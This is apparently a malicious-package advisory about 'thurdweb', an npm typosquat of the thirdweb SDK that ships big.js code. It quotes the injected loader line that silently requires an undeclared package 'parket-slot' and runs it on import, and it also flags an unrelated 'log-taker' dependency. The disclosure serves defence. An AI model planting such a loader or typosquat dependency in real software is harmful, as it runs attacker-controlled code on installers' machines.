MAL-2026-6345

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (775ff15f4a1314978d4cfed1e97c6c9ac8621d8ddeed93160c25aa3681f73cc7) Package name `thurdweb` is a one-character substitution of the popular web3 SDK `thirdweb`, but the shipped source is a copy of MikeMcl/big.js (arbitrary-precision decimal arithmetic) — the public API has no relation to the impersonated target. The library file (`big.js` / `big.mjs` lines 605-608) contains an injected top-level block that fires on `require('thurdweb')` / `import 'thurdweb'`: `try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }`. `parket-slot` is not declared in `package.json` `dependencies`, and the entire call is wrapped in an empty try/catch that silently swallows every error. `package.json` additionally declares `log-taker@^0.0.9` as a runtime dependency, which is unrelated to decimal arithmetic and shares the same nondescriptive shape. Any installer who imports this package transitively loads attacker-controlled code from sibling packages whose contents the publisher controls and can mutate independently of this tarball; the silent error handler hides failure from the consumer.